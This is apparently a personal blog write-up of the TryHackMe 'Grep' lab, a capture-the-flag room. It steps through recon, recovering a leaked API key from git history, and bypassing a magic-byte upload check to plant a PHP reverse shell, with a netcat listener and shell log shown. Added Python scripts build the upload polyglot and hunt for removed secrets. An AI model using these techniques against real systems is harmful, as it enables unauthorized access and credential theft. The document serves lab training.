This is the write-up for the Grep Easy Challenge from the TryHackMe cybersecurity platform. This room is very good for beginners and it can help them understand the fundamentals of OSINT (Open-Source Intelligence), File Upload Vulnerabilities, and the term Reverse Shell.
Grep
Link: https://tryhackme.com/room/greprtp
Difficulty: Easy
Description
Welcome to the OSINT challenge, part of TryHackMe’s Red Teaming Path. In this task, you will be an ethical hacker aiming to exploit a newly developed web application.
SuperSecure Corp, a fast-paced startup, is currently creating a blogging platform inviting security professionals to assess its security. The challenge involves using OSINT techniques to gather information from publicly accessible sources and exploit potential vulnerabilities in the web application.
Start by deploying the machine; Click on the Start Machine button in the upper-right-hand corner of this task to deploy the virtual machine for this room.
Your goal is to identify and exploit vulnerabilities in the application using a combination of recon and OSINT skills. As you progress, you’ll look for weak points in the app, find sensitive data, and attempt to gain unauthorized access. You will leverage the skills and knowledge acquired through the Red Team Pathway to devise and execute your attack strategies.
Note: Please allow the machine 3 - 5 minutes to fully boot. Also, no local privilege escalation is necessary to answer the questions.
Reconnaissance
I did the enumeration using RustScan.
kali@kali:~/THM/Easy/Grep$ sudo rustscan -a 10.10.186.114 -- -sV -sC -vv -oA rustscan
PORT      STATE SERVICE  REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 21:c7:dc:17:44:78:ef:5f:47:c6:b9:39:f7:cb:ba:53 (RSA)
| ssh-rsa ...
| 256 78:13:74:43:7d:d3:b9:af:5f:f2:e7:2d:44:43:a5:5b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP++9LW+4Wiy604LwL/r1TeDNPlN1YovNNhHA/uEjwrfbBhFe/9C6hjZOLtrDQ49xcj2lcy35EuI8XY4IW2rzJ4=
| 256 72:6a:ef:4c:22:8d:29:74:b2:41:bd:5d:30:ad:dd:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ4cVRD6b83BLlQqlADWAkc4jYd7A6gNBOGN+yBNyN7D
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| ssl-cert: Subject: commonName=grep.thm/organizationName=SearchME/stateOrProvinceName=Some-State/countryName=US
| Issuer: commonName=grep.thm/organizationName=SearchME/stateOrProvinceName=Some-State/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-14T13:03:09
| Not valid after: 2024-06-13T13:03:09
| MD5: 7295:8ef0:7c16:221c:3b0a:40ee:913c:766c
| SHA-1: 38c2:3ba3:34b1:851a:f1d4:ee0a:37bd:701a:830c:7dd8
| -----BEGIN CERTIFICATE-----
| MIIDFzCCAf8CFGTWwbbVKaNSN8fhUdtf0QT84zCSMA0GCSqGSIb3DQEBCwUAMEgx
| CzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMREwDwYDVQQKDAhTZWFy
| Y2hNRTERMA8GA1UEAwwIZ3JlcC50aG0wHhcNMjMwNjE0MTMwMzA5WhcNMjQwNjEz
| MTMwMzA5WjBIMQswCQYDVQQGEwJVUzETMBEGA1UECAwKU29tZS1TdGF0ZTERMA8G
| A1UECgwIU2VhcmNoTUUxETAPBgNVBAMMCGdyZXAudGhtMIIBIjANBgkqhkiG9w0B
| AQEFAAOCAQ8AMIIBCgKCAQEAtiDNwwY9IR2HADMy6CRAwiPH0s8dIOFGPrbYCbLz
| fDKIWURlczzOlmgpscN/YHHpt6P5ywUPLGnMK3ukYag7xTUYl+vmledTnD9oebnJ
| 6qDweFFwdZ8hysITyvCyGgqcY52JE2nBtVNj6/L16iZ60KKko8opNsTE5IYj/sUt
| PsOxeNiV3oqpOUeKtZJbn7Kssd4KBwnRqTSUlXlPXzeRipAiW5SZZXo6K4YeLVht
| XlLPtPWsMC0fj16DDDtxLlZmvu3J5o9egp/eRpWmvKWIaKQ57Y0MKB8/gso8FxxX
| NiRY9Nru0C3DCUbc/xXywQ9pIGt/Xir++aXhyxCiIGh22QIDAQABMA0GCSqGSIb3
| DQEBCwUAA4IBAQCzhJu52dIY7V/qQleDMEQ1oBLrQoFhHD6+UbvH0ELMAtL5Dc8A
| LGDdyFkgsx04TaZtJ20dyrjYD+tcAgu9Yb7eEYbfqqD5w4XSzvdEuTW2aVL86aT6
| IBbN8SMkX2zfILjHTOR1F7WAoHaIssH0yZltg+lQEEnAeb+XoIZm9cIW2bTNKoO2
| MeHgvSKkQkjROO29XQQ3mTbxFG86UsTwyGHdddnkfiWilXqgfh+wGxbY/wCdhU0C
| TnuXn4IEVdCBn16rCg51kEZZC1EWPcJpv0/InUNfcgumcVY033EXF/HgW4eNDD6H
| XmLEGKfScUWcO0//STDZGZXwf9gt30DqoMSf
|_-----END CERTIFICATE-----
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
51337/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.41 (Ubuntu)
Open ports:
- 22 (SSH)
- 80 (HTTP)
- 443 (SSL/HTTP) (Found grep.thm from the certificate)
- 51337 (HTTP)
Port 80:

Port 443:

Then I added grep.thm into the /etc/hosts file in order to open the website.
Then I was able to see the actual website.
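The hostname came from the certificate nmap dumped on port 443, which is the standard way to discover virtual hosts that are not in DNS. The following script is an added example (not part of the original write-up or the project) that pulls every commonName and subjectAltName dNSName out of a PEM certificate with a minimal hand-written DER walker, so it needs nothing outside the Python standard library. The certificate embedded below is the one copied verbatim from the scan above; the parser itself is an assumption of this example and handles only the tags that appear in X.509 names and the SAN extension.

```python
import base64

# The self-signed certificate nmap printed for 10.10.186.114:443, copied verbatim from the scan.
CERT_PEM = """\
-----BEGIN CERTIFICATE-----
MIIDFzCCAf8CFGTWwbbVKaNSN8fhUdtf0QT84zCSMA0GCSqGSIb3DQEBCwUAMEgx
CzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMREwDwYDVQQKDAhTZWFy
Y2hNRTERMA8GA1UEAwwIZ3JlcC50aG0wHhcNMjMwNjE0MTMwMzA5WhcNMjQwNjEz
MTMwMzA5WjBIMQswCQYDVQQGEwJVUzETMBEGA1UECAwKU29tZS1TdGF0ZTERMA8G
A1UECgwIU2VhcmNoTUUxETAPBgNVBAMMCGdyZXAudGhtMIIBIjANBgkqhkiG9w0B
AQEFAAOCAQ8AMIIBCgKCAQEAtiDNwwY9IR2HADMy6CRAwiPH0s8dIOFGPrbYCbLz
fDKIWURlczzOlmgpscN/YHHpt6P5ywUPLGnMK3ukYag7xTUYl+vmledTnD9oebnJ
6qDweFFwdZ8hysITyvCyGgqcY52JE2nBtVNj6/L16iZ60KKko8opNsTE5IYj/sUt
PsOxeNiV3oqpOUeKtZJbn7Kssd4KBwnRqTSUlXlPXzeRipAiW5SZZXo6K4YeLVht
XlLPtPWsMC0fj16DDDtxLlZmvu3J5o9egp/eRpWmvKWIaKQ57Y0MKB8/gso8FxxX
NiRY9Nru0C3DCUbc/xXywQ9pIGt/Xir++aXhyxCiIGh22QIDAQABMA0GCSqGSIb3
DQEBCwUAA4IBAQCzhJu52dIY7V/qQleDMEQ1oBLrQoFhHD6+UbvH0ELMAtL5Dc8A
LGDdyFkgsx04TaZtJ20dyrjYD+tcAgu9Yb7eEYbfqqD5w4XSzvdEuTW2aVL86aT6
IBbN8SMkX2zfILjHTOR1F7WAoHaIssH0yZltg+lQEEnAeb+XoIZm9cIW2bTNKoO2
MeHgvSKkQkjROO29XQQ3mTbxFG86UsTwyGHdddnkfiWilXqgfh+wGxbY/wCdhU0C
TnuXn4IEVdCBn16rCg51kEZZC1EWPcJpv0/InUNfcgumcVY033EXF/HgW4eNDD6H
XmLEGKfScUWcO0//STDZGZXwf9gt30DqoMSf
-----END CERTIFICATE-----
"""

OID_COMMON_NAME = bytes.fromhex("550403")  # id-at-commonName (2.5.4.3)
OID_SUBJECT_ALT = bytes.fromhex("551d11")  # id-ce-subjectAltName (2.5.29.17)
STRING_TAGS = {0x0C, 0x13, 0x16}           # UTF8String, PrintableString, IA5String
CONSTRUCTED = {0x30, 0x31, 0xA0, 0xA3}     # SEQUENCE, SET, [0] version, [3] extensions


def pem_to_der(pem: str) -> bytes:
    body = "".join(l.strip() for l in pem.splitlines() if l and not l.startswith("-----"))
    return base64.b64decode(body)


def read_tlv(buf: bytes, pos: int):
    """Decode one DER tag-length-value at pos; returns (tag, value_start, value_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: the next (length & 0x7f) bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, pos, pos + length


def collect_names(buf: bytes, start: int, end: int, found: list) -> None:
    """Recursively descend SEQUENCE/SET nodes and harvest CN values and SAN dNSName entries."""
    pos = start
    while pos < end:
        tag, vs, ve = read_tlv(buf, pos)
        if tag in CONSTRUCTED:
            collect_names(buf, vs, ve, found)
        elif tag == 0x06 and buf[vs:ve] == OID_COMMON_NAME:
            t, s, e = read_tlv(buf, ve)    # the AttributeValue directly follows the OID
            if t in STRING_TAGS:
                found.append(buf[s:e].decode("utf-8", "replace"))
        elif tag == 0x06 and buf[vs:ve] == OID_SUBJECT_ALT:
            t, s, e = read_tlv(buf, ve)
            if t == 0x01:                  # optional "critical" BOOLEAN
                t, s, e = read_tlv(buf, e)
            if t == 0x04:                  # extnValue OCTET STRING wrapping GeneralNames
                _, gs, ge = read_tlv(buf, s)
                p = gs
                while p < ge:
                    gt, gvs, gve = read_tlv(buf, p)
                    if gt == 0x82:         # dNSName [2] IA5String
                        found.append(buf[gvs:gve].decode("ascii", "replace"))
                    p = gve
        pos = ve


def hostnames_from_pem(pem: str) -> list:
    """Return the unique hostnames (issuer/subject CN and SAN dNSNames) in certificate order."""
    der = pem_to_der(pem)
    _, start, end = read_tlv(der, 0)       # outer Certificate SEQUENCE
    names: list = []
    collect_names(der, start, end, names)
    return list(dict.fromkeys(names))


if __name__ == "__main__":
    for host in hostnames_from_pem(CERT_PEM):
        print(f"10.10.186.114 {host}   # candidate /etc/hosts entry")
```

This certificate is a v1 self-signed cert with no extensions, so only the commonName (present in both issuer and subject, hence de-duplicated) comes back; on a CA-issued v3 certificate the SAN branch usually yields several additional vhosts worth adding to /etc/hosts.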

Then I used Feroxbuster to enumerate the directories.
But this didn't really give any information about what is actually going on.
403 GET 9l 28w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c https://grep.thm/ => https://grep.thm/public/html/
301 GET 9l 28w 304c https://grep.thm/api => https://grep.thm/api/
302 GET 0l 0w 0c https://grep.thm/index.php => https://grep.thm/public/html/
301 GET 9l 28w 311c https://grep.thm/javascript => https://grep.thm/javascript/
200 GET 0l 0w 0c https://grep.thm/api/index.php
301 GET 9l 28w 307c https://grep.thm/public => https://grep.thm/public/
301 GET 9l 28w 312c https://grep.thm/api/uploads => https://grep.thm/api/uploads/
[####################] - 12s 18464/18464 0s found:7 errors:7911
[####################] - 11s 4614/4614 426/s https://grep.thm/
[####################] - 9s 4614/4614 523/s https://grep.thm/api/
[####################] - 4s 4614/4614 1050/s https://grep.thm/javascript/
[####################] - 3s 4614/4614 1521/s https://grep.thm/public/
So I started to crawl the whole website by using Burp Suite.
Question #1
What is the API key that allows a user to register on the website?
I noticed the Register button, but when I tried to register it gave this error Invalid or Expired API key in an alert box.

Then I checked the actual request parameters and saw this.

I noticed an unusual header labeled X-Thm-Api-Key, which seemed to be the API key and looked like an MD5 hash digest.
So, I thought I could crack it by using this website https://md5hashing.net/ and saw that it's the hash of johncena.

After thinking a little bit, I figured that this is the OSINT part, but after doing a little bit of research I gave up and started to look at other places.
Then I went back to the main page and saw the notice "This website is under development.", which made me think that, since it's under development, I might be able to find the source code of this project online.
I searched Google for "SearchME GitHub" and "Grep GitHub" for about 15 minutes but couldn't find anything. Then I realized that I can search for repositories inside GitHub as well, used the search filters (language: PHP), and found these repositories.

I checked every single repository and found that supersecuredeveloper/searchmecms has a similar file structure to the actual website.

I checked the api/register.php file and found the API key "TBA". I tried using this API key but it didn't work (TBA stands for "to be announced", so that makes sense).
I checked the older commits and found a commit labeled "Fix: remove key".
I browsed the changes in this commit and found the actual key, which let me register.
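Secrets that were committed and later "removed" stay in git history, which is what made the "Fix: remove key" commit useful. The script below is an added example (not from the write-up or the searchmecms repository) that automates the search: it walks every commit diff with git log -p and reports key-shaped values on deleted lines, so the removal commit itself betrays the value. It builds a throwaway two-commit repository as a constructed stand-in for the real history; the key in it is a placeholder, not the room's key, and the 32-hex-character pattern is an assumption based on the X-Thm-Api-Key header looking like an MD5 digest. It requires a git binary on PATH.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Assumption: the key looks like an MD5 digest (32 hex chars), as the X-Thm-Api-Key header did.
KEY_RE = re.compile(r"\b[0-9a-f]{32}\b")
PLACEHOLDER_KEY = "0123456789abcdef0123456789abcdef"   # constructed value, not the real key


def git(repo: str, *args: str) -> str:
    return subprocess.run(["git", "-C", repo, *args], check=True,
                          capture_output=True, text=True).stdout


def make_demo_repo(repo: str) -> None:
    """Constructed stand-in for the searchmecms history: commit the key, then 'remove' it."""
    git(repo, "init", "-q")
    git(repo, "config", "user.email", "dev@example.invalid")
    git(repo, "config", "user.name", "dev")
    target = Path(repo) / "api" / "register.php"
    target.parent.mkdir(parents=True)
    target.write_text(f"<?php\n$apiKey = '{PLACEHOLDER_KEY}';\n")
    git(repo, "add", ".")
    git(repo, "commit", "-q", "-m", "Add register endpoint")
    target.write_text("<?php\n$apiKey = 'TBA';\n")
    git(repo, "add", ".")
    git(repo, "commit", "-q", "-m", "Fix: remove key")


def removed_secrets(repo: str) -> dict:
    """Map each key-shaped string found on a deleted ('-') diff line to the commit that deleted it."""
    log = git(repo, "log", "-p", "--all", "--format=commit %H %s")
    found: dict = {}
    commit = None
    for line in log.splitlines():
        if line.startswith("commit "):
            commit = line[len("commit "):]
        elif line.startswith("-") and not line.startswith("--- "):   # skip '--- a/file' headers
            for match in KEY_RE.findall(line):
                found.setdefault(match, commit)
    return found


def demo() -> dict:
    with tempfile.TemporaryDirectory() as repo:
        make_demo_repo(repo)
        return removed_secrets(repo)


if __name__ == "__main__":
    for key, commit in demo().items():
        print(f"{key}  removed in: {commit}")
```

Against a cloned repository you would call removed_secrets(path) directly; the same loop works for AWS-style or JWT patterns by swapping KEY_RE, and git log -p --all also covers branches and tags that the GitHub web UI does not show on the default branch.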

Question #2
What is the first flag?
After logging in with the credentials I used to register, I was greeted with the first flag.

Question #3
What is the email of the "admin" user?
After checking the website while logged in, I went back to the GitHub repository to look for other interesting things and saw upload.php in the api folder. As the name suggests, this could be a potential way to get a reverse shell.
At first I was trying to upload the shell using curl, but later I found this upload page:

I tried uploading the php-reverse-shell.php but it failed with this error {"error":"Invalid file type. Only JPG, JPEG, PNG, and BMP files are allowed."}
I went back to check the content of the upload.php file and saw that there is a checkMagicBytes() method that reads the first 4 bytes of the file and compares those with $validMagicBytes.
<?php
session_start();
require 'config.php';
$uploadPath = 'uploads/';
function checkMagicBytes($fileTmpPath, $validMagicBytes) {
$fileMagicBytes = file_get_contents($fileTmpPath, false, null, 0, 4);
return in_array(bin2hex($fileMagicBytes), $validMagicBytes);
}
$allowedExtensions = ['jpg', 'jpeg', 'png', 'bmp'];
$validMagicBytes = [
'jpg' => 'ffd8ffe0',
'png' => '89504e47',
'bmp' => '424d'
];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_SESSION['username'])) {
if (isset($_FILES['file'])) {
$file = $_FILES['file'];
$fileName = $file['name'];
$fileTmpPath = $file['tmp_name'];
$fileExtension = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
if (checkMagicBytes($fileTmpPath, $validMagicBytes)) {
$uploadDestination = $uploadPath . $fileName;
move_uploaded_file($fileTmpPath, $uploadDestination);
echo json_encode(['message' => 'File uploaded successfully.']);
} else {
echo json_encode(['error' => 'Invalid file type. Only JPG, JPEG, PNG, and BMP files are allowed.']);
}
} else {
echo json_encode(['error' => 'No file uploaded.']);
}
} else {
echo json_encode(['error' => 'User not logged in.']);
}
} else {
echo json_encode(['error' => 'Unsupported request method.']);
}
?>
This is broken and can be easily bypassed: $allowedExtensions and $fileExtension are declared but never used, so the extension is never checked, and only the first 4 bytes are compared. We can simply prepend a JPEG header to php-reverse-shell.php (editing the first bytes with the Ghex hex editor) and get past this "professional file extension checker".
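To make the bypass and its fix concrete, here is an added example (not from the write-up or the searchmecms project) that mirrors checkMagicBytes() in Python, builds the same polyglot the Ghex edit produces, and shows what a correct check looks like beside it. The PHP payload is a constructed placeholder rather than the reverse shell; hardened_check() and server_side_name() are this example's own suggestions, not code from the project.

```python
import os
import secrets

# Copied from upload.php. The checker compares the hex of the first FOUR bytes against these
# strings, so the two-byte BMP entry '424d' can never match and genuine BMPs are rejected, while
# Exif JPEGs (ffd8ffe1) are rejected too because only the JFIF marker ffd8ffe0 is listed.
VALID_MAGIC_BYTES = {"jpg": "ffd8ffe0", "png": "89504e47", "bmp": "424d"}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "bmp"}   # declared in upload.php but never enforced


def vulnerable_check(data: bytes) -> bool:
    """Python mirror of checkMagicBytes(): only the first 4 bytes are inspected, the name is ignored."""
    return data[:4].hex() in VALID_MAGIC_BYTES.values()


def build_polyglot(php_source: bytes, magic_hex: str = "ffd8ffe0") -> bytes:
    """Prepend a JFIF header to a PHP file. Apache still hands the file to PHP because of its .php
    extension; PHP echoes the four junk bytes as text and then executes the <?php block."""
    return bytes.fromhex(magic_hex) + php_source


def hardened_check(filename: str, data: bytes) -> bool:
    """What the server should do instead: allow-list the extension, then require the magic bytes
    that belong to THAT extension, compared at their real length. Uploads must additionally live
    in a directory the web server never executes scripts from; a check alone is not enough."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        return False
    expected = bytes.fromhex(VALID_MAGIC_BYTES["jpg" if ext == "jpeg" else ext])
    return data[: len(expected)] == expected


def server_side_name(filename: str) -> str:
    """Discard the client-supplied name (upload.php concatenates it straight into $uploadPath)
    and keep only the already-vetted extension."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed stand-in for php-reverse-shell.php; any PHP body behaves the same way.
    payload = build_polyglot(b"<?php echo 'polyglot'; ?>\n")
    with open("php-reverse-shell.php", "wb") as fh:
        fh.write(payload)
    print("passes original check :", vulnerable_check(payload))
    print("passes hardened check :", hardened_check("php-reverse-shell.php", payload))
```

Upload the written php-reverse-shell.php through the same form and the response is the "File uploaded successfully." message from the write-up, because nothing in upload.php ever looks at the extension.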

And then I uploaded the shell, and got this result {"message":"File uploaded successfully."}
Then I started a netcat listener.
kali@kali:~/THM/Easy/Grep$ nc -lvnp 4444
listening on [any] 4444 ...
Since upload.php is in the api folder, the uploads folder must also be inside the api folder (as specified in the code: $uploadPath = 'uploads/';).
So all I had to do was open https://grep.thm/api/uploads/php-reverse-shell.php, and done, I got the reverse shell in the netcat listener.
kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.84.107] from (UNKNOWN) [10.10.186.114] 47408
Linux ip-10-10-186-114 5.15.0-1038-aws #43~20.04.1-Ubuntu SMP Fri Jun 2 17:10:57 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
20:39:39 up 1:09, 0 users, load average: 0.00, 0.00, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
After digging a little bit, I found a backup folder which contains a users.sql file.


This file contains the admin's email address.

Question #4
What is the host name of the web application that allows a user to check an email for a possible password leak?
To find this, we just need to look at the contents of the /etc/hosts file on the target, which contains the hostname.

Question #5
What is the password of the "admin" user?
I tried to access the password leak website but it didn't open.

So I checked the Apache2 config and saw that this password leak website is running on port 51337, so I appended :51337 to the URL to specify the port and the website opened.

Then all I had to do was enter the admin's email to check if it had been leaked, and it gave the admin's password.

Conclusion
This room is very good for beginners and it can help them understand the fundamentals of OSINT (Open-Source Intelligence), File Upload Vulnerabilities, and the term Reverse Shell.
Mher's Blog